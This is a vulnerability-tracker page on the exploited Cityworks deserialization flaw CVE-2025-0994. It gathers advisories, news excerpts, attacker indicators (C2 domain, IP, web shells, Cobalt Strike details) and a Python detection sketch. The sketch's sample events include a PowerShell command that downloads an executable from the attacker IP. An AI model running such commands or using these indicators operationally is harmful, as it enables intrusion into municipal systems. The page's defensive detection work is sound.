CVE-2025-0994
Published 2025-02-06
Priority P1 · 90 · CVSS 3.1: 8.8 (high)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CISA Known Exploited Vulnerability (KEV), remediation due 2025-02-28
Exploited in the wild
EPSS: 27.43% (97.8th percentile)
Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer’s Microsoft Internet Information Services (IIS) web server.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trimble | cityworks | < 23.10 | 23.10 |
| trimble | cityworks | < 15.8.9 | 15.8.9 |
| trimble | cityworks | >= 23.0 < 23.10 | 23.10 |
Detection & IOCs (extracted from sources)
- Detect web shell deployment (AntSword, chinatso/Chopper, Behinder) under the Cityworks IIS web root paths, particularly c:\inetpub\wwwroot\CityworksServer\.
- Hunt for Cobalt Strike beacons with Watermark 987654321 and C2 domain lgaircon.xyz; both beacon configs share this watermark value.
- Detect Cobalt Strike beacon traffic to lgaircon.xyz mimicking OWA paths (/owa/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2 and /owa/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG) with a fake Microsoft telemetry cookie header.
- Alert on PowerShell Invoke-WebRequest calls from IIS worker processes downloading executables from 192.210.239.172 on port 3219 to C:\windows\temp\.
- TetraLoader (Rust-based) injects shellcode into notepad.exe; monitor for notepad.exe spawned by non-interactive parent processes or with injected remote threads.
- Monitor for the Cobalt Strike spawn-to processes dllhost.exe and gpupdate.exe being used as injection targets (x86: syswow64, x64: sysnative); these are non-default spawn-to values and indicate custom beacon profiles.
- Detect staging of files from the Cityworks web root into the Uploads subdirectory, which UAT-6382 used to pre-position data for exfiltration.
- The Cobalt Strike beacon C2 URI paths for the second beacon config (/owa/...) mimic legitimate Microsoft OWA endpoints; defenders should not whitelist OWA-like URIs to lgaircon.xyz.
- Trimble warns that some on-premises Cityworks deployments may have overprivileged IIS identity permissions; IIS should not run with local or domain-level administrative privileges, since that amplifies the impact of RCE.
- Some Cityworks deployments have incorrect attachment directory configurations; the vendor recommends restricting attachment root folders to contain only attachments, to limit post-exploitation web shell placement.
- TetraLoader is built with the publicly available MaLoader framework (which appeared on GitHub in December 2024); signatures for TetraLoader may need to account for the multiple encoding/encryption options MaLoader supports.
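A detection sketch for the host-based indicators in the list above, added here as an example; it is not code from Talos, Trimble or any other cited source. It assumes Sysmon-style process-creation and file-creation events represented as Python dicts, that w3wp.exe is the IIS worker process, and that the interactive parent list, web shell script extensions and temp directory in the comments are reasonable defaults; the sample events are constructed, not real telemetry.

```python
import ntpath
# Indicators and paths quoted from the Detection & IOCs list above.
DOWNLOAD_SOURCE = "192.210.239.172:3219"
CITYWORKS_WEBROOT = r"c:\inetpub\wwwroot\cityworksserver"
SPAWN_TO = {"dllhost.exe", "gpupdate.exe"}
TEMP_DIR = r"c:\windows\temp"  # the page names this as the download location
# Assumptions: w3wp.exe is the IIS worker process; these are the parents a user
# normally launches notepad.exe from; web shells use these server-side extensions.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
SCRIPT_EXTS = {".aspx", ".ashx", ".asmx"}

def base(path):
    return ntpath.basename(path).lower()  # lower-cased file name of a Windows path

def check_process(ev):
    # Rules tripped by one process-creation event: {image, parent, cmdline}.
    image, parent = base(ev["image"]), base(ev["parent"])
    parent_path, cmd = ev["parent"].lower(), ev["cmdline"].lower()
    hits = []
    if parent == "w3wp.exe" and image in {"powershell.exe", "cmd.exe"}:
        hits.append("iis_spawns_shell")
        if "invoke-webrequest" in cmd and DOWNLOAD_SOURCE in cmd:
            hits.append("iis_downloads_from_c2")
    if image == "notepad.exe" and parent not in INTERACTIVE_PARENTS:
        hits.append("notepad_noninteractive_parent")
    if image in SPAWN_TO and parent_path.startswith(TEMP_DIR + "\\"):
        hits.append("spawn_to_from_temp")
    return hits

def check_file(ev):
    # Rules tripped by one file-creation event: {image, target}.
    target, hits = ev["target"].lower(), []
    if base(ev["image"]) == "w3wp.exe" and target.startswith(CITYWORKS_WEBROOT + "\\"):
        if ntpath.splitext(target)[1] in SCRIPT_EXTS:
            hits.append("script_written_under_cityworks_root")
        if "\\uploads\\" in target:
            hits.append("file_staged_in_uploads")
    return hits

def scan(events):
    # Pair each event index with the rules it trips; file events carry "target".
    found = [(i, check_file(e) if "target" in e else check_process(e)) for i, e in enumerate(events)]
    return [(i, h) for i, h in found if h]

# Constructed sample telemetry, not logs from any real incident.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": r"powershell -c Invoke-WebRequest http://192.210.239.172:3219/t.exe -OutFile C:\windows\temp\t.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\windows\temp\t.exe", "cmdline": "notepad.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
    {"image": r"C:\Windows\SysWOW64\dllhost.exe", "parent": r"C:\windows\temp\t.exe", "cmdline": "dllhost.exe"},
    {"image": r"C:\Windows\System32\inetsrv\w3wp.exe", "target": r"C:\inetpub\wwwroot\CityworksServer\Uploads\shell.aspx"},
]
```

Only the explorer-launched notepad.exe event passes clean; the other four each trip at least one rule, which is the behaviour a real rule set over EDR telemetry should reproduce.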
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | 4.0 | 8.6 | HIGH | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 8.6 | HIGH | |
| cisa | | 8.6 | HIGH | |
CISA ICS
Trimble Cityworks (Update A)
cisa_ics · 2025-02-11 · CVSS 8.6 · [HIGH]
ICS Advisory
Last Revised: February 11, 2025
Alert Code: ICSA-25-037-04
Related topics: Industrial Control System Vulnerabilities, Industrial Control Systems
## 1. EXECUTIVE SUMMARY
- CVSS v4 8.6
- ATTENTION: Exploitable remotely/low attack complexity/known public exploitation
- Vendor: Trimble
- Equipment: Cityworks
- Vulnerability: Deserialization of Untrusted Data
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an authenticated user to perform a remote code execution.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following versions of Trimble Cityworks, an asset and work management system, are affected:
- Cityworks: All versions prior to 15.8.9
- Cityworks with office c
CISA
Trimble Cityworks Deserialization Vulnerability
cisa · 2025-02-07 · CVSS 8.6 · [HIGH] · CWE-502
Affected: Trimble Cityworks
Trimble Cityworks contains a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer's Microsoft Internet Information Services (IIS) web server.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://learn.assetlifecycle.trimble.com/i/1532182-cityworks-customer-communication-2025-02-05-docx/0?; https://www.cisa.gov/news-events/ics-advisories/icsa-25-037-04 ; https://nvd.nist.gov/vuln/detail/CVE-2025-0994
Remediation Due Date: 2025-02-28
GHSA
GHSA-m5q8-8x36-w25p: Trimble Cityworks versions prior to 15
ghsa_unreviewed · 2025-02-06 · [HIGH] · CWE-502
Trimble Cityworks versions prior to 15.8.9 and Cityworks with office companion versions prior to 23.10 are vulnerable to a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer’s Microsoft Internet Information Services (IIS) web server.
VulnCheck
Trimble Cityworks Deserialization Vulnerability
vulncheck · 2025 · CVSS 8.6 · [HIGH] · CWE-502
Trimble Cityworks contains a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer's Microsoft Internet Information Services (IIS) web server.
Affected: Trimble Cityworks
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-037-04; https://learn.assetlifecycle.trimble.com/i/1532182-cityworks-customer-communication-2025-02-06-docx/0?; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.recordedfuture.com/blog/trimble-cityworks-cve-2025-0994-vulnerability-analysis; https
No detection rules found.
No public exploits indexed.
Talos
UAT-8302 and its box full of malware
blogs_talos · 2026-05-05
Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.
After successful compromises, UAT-8302 deploys multiple custom-made malware families that have previously been used by other known China-nexus threat actors.
Talos discovered a .NET-based backdoor we track as “NetDraft” that is a C#-based variant of the FinalDraft/SquidDoor malware family developed and operated by Jewelbug / REF7707 / CL-STA-0049 / LongNosedGoblin, a cluster of China-nexus APT actors.
Furthermore, UAT-8302 also uses an updated version of the CloudSorcerer backdoor, a malware family used in attacks ag
Hackernews
China-Linked TA416 Targets European Governments with PlugX and OAuth-Based Phishing
blogs_hackernews · 2026-04-03
A China-aligned threat actor has set its sights on European government and diplomatic organizations since mid-2025, following a two-year period of minimal targeting in the region.
The campaign has been attributed to TA416, a cluster of activity that overlaps with DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda.
"This TA416 activity included multiple waves of web bug and malware delivery campaigns against diplomatic missions to the European Union and NATO across a range of European countries," Proofpoint researchers Mark Kel
Talos
Ghosted by a cybercriminal
blogs_talos · 2025-05-22
Welcome to this week’s edition of the Threat Source newsletter.
Talos recently published research into how threat actors are increasingly teaming up across the attack chain. Each group handles a slice of the operation, passing the breach along like a relay baton.
It’s a concerning trend — one that we believe calls for rethinking traditional threat modeling. But one thing stood out to me while reading: cybercriminals are often terrible at teamwork.
What if the ransomware affiliate is waiting on credentials that never arrive? The access broker sells a foothold, but the tooling meant to exploit it isn’t ready, doesn’t work in the target environment or never shows up at all?
Ghosting isn’t limited to dating apps or job interviews (and if you’ve been through
Bleepingcomputer
Chinese hackers breach US local governments using Cityworks zero-day
blogs_bleepingcomputer · 2025-05-22 · CVSS 8.6 · [HIGH]
By Sergiu Gatlan
These attacks started in January 2025, when Cisco Talos observed the first signs of reconnaissance activity within the breached organizations' networks.
"Talos has found intrusions in enterprise networks of local governing bodies in the United States (U.S.), beginning January 2025 when initial exploitation first took place. Upon gaining access, UAT-6382 expressed a clear interest in pivoting to systems related to utilities management," said Cisco Talos security researchers Asheer Malhotra and Brandon White.
"The web shells, including AntSword, chinatso/Chopper and generic file uploaders, contained messaging written in the Chinese language. Furthermore, the custom tooling, TetraLoader, was built usi
Talos
UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
blogs_talos · 2025-05-22 · CVSS 5.3 · [MEDIUM]
Cisco Talos has observed exploitation of CVE-2025-0994, a remote-code-execution vulnerability in Cityworks, a popular asset management system.
The Cybersecurity and Infrastructure Security Agency (CISA) and Trimble have both released advisories pertaining to this vulnerability, with Trimble’s advisory specifically listing indicators of compromise (IOCs) related to the intrusion exploiting the CVE.
IOCs pertaining to intrusions discovered by Talos that involve the exploitation of CVE-2025-0994 overlap with those listed in Trimble’s advisory.
Talos clusters this set of intrusions, exploiting CVE-2025-0994, under the “UAT-6382” umbrella of activity. Based on tooling and tactics, techniques and procedures (TTPs) emp
Checkpoint
10th February – Threat Intelligence Report
blogs_checkpoint · 2025-02-10
For the latest discoveries in cyber research for the week of 10th February, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Grubhub, the US-based online food ordering and delivery platform, suffered a data breach due to unauthorized access through a compromised third-party service provider’s account. The incident exposed personal details of customers, drivers, and merchants, including names, email addresses, phone numbers, payment card types
Bleepingcomputer
Hackers exploit Cityworks RCE bug to breach Microsoft IIS servers
blogs_bleepingcomputer · 2025-02-07 · CVSS 8.6 · [HIGH]
By Bill Toulas
Software vendor Trimble is warning that hackers are exploiting a Cityworks deserialization vulnerability to remotely execute commands on IIS servers and deploy Cobalt Strike beacons for initial network access.
Trimble Cityworks is a Geographic Information System (GIS)-centric asset management and work order management software designed primarily for local governments, utilities, and public works organizations.
The product helps municipalities and infrastructure agencies manage public assets, process work orders, handle permitting and licensing, capital planning, and budgeting, among other things.
The flaw, tracked as CVE-2025-0994, is a high severity (CVSS v4.0 score: 8.6) deserialization problem that
Recorded Future
Trimble Cityworks: CVE-2025-0994: Active Exploitation
blogs_recorded_future · CVSS 8.6 · [HIGH]
## What is CVE-2025-0994?
CVE-2025-0994 is a high-severity deserialization vulnerability in Trimble Cityworks, an asset management and work order software designed for local governments and utilities. The critical infrastructure sectors Cityworks services include water and wastewater systems, energy, transportation systems, government services and facilities, and communications.
The vulnerability affects Cityworks versions before 15.8.9 and Cityworks with Office Companion versions before 23.10.
Successfully exploiting CVE-2025-0994 can allow authenticated attackers to conduct remote code execution (RCE) against a target’s Microsoft Internet Information Services (IIS) web server.
## Insikt Group’s Assessment of CVE-2025-0994
Indicators of compromis
- 2025-02-06: Published
- 2025-02-07: Added to CISA KEV
- Exploited in the wild